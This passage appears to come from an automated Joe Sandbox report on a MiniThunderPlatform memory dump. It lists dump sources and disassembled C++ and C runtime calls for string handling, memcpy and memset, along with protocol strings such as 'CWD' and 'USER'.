                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??0?$basic_string@??1?$basic_string@$V01@@$??$?8D@1@@std@@D@2@@0@0@V?$basic_string@
                                                                                                                                              • String ID: Content-Type
                                                                                                                                              • API String ID: 2073992192-2058190213
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(CWD), ref: 1009D644
                                                                                                                                                • Part of subcall function 1009D410: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 1009D446
                                                                                                                                                • Part of subcall function 1009D410: ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71 ref: 1009D45A
                                                                                                                                                • Part of subcall function 1009D410: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(1027E6E8), ref: 1009D470
                                                                                                                                                • Part of subcall function 1009D410: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 1009D47B
                                                                                                                                                • Part of subcall function 1009D410: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(10277F04), ref: 1009D48A
                                                                                                                                                • Part of subcall function 1009D410: ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,USER), ref: 1009D49C
                                                                                                                                                • Part of subcall function 1009D410: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(USER ******), ref: 1009D4AE
                                                                                                                                                • Part of subcall function 1009D410: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009D4F6
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009D66F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??0?$basic_string@$??1?$basic_string@D@1@@std@@D@2@@0@V01@V?$basic_string@Y?$basic_string@$??$?8??$?9?append@?$basic_string@V01@@V12@V12@@
                                                                                                                                              • String ID: CWD
                                                                                                                                              • API String ID: 587145879-165061777
                                                                                                                                              APIs
                                                                                                                                              • memcpy.MSVCR71(?,?,?,?,?,?), ref: 100150A0
                                                                                                                                              • memcpy.MSVCR71(?,?,00000010,?,00000001,?,?,?,?,?), ref: 100150E3
                                                                                                                                              • memset.MSVCR71(?,00000010,00000010,?,?,?), ref: 10015104
                                                                                                                                              • memcpy.MSVCR71(?,?,00000000,?,?,?), ref: 1001511F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcpy$memset
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 438689982-0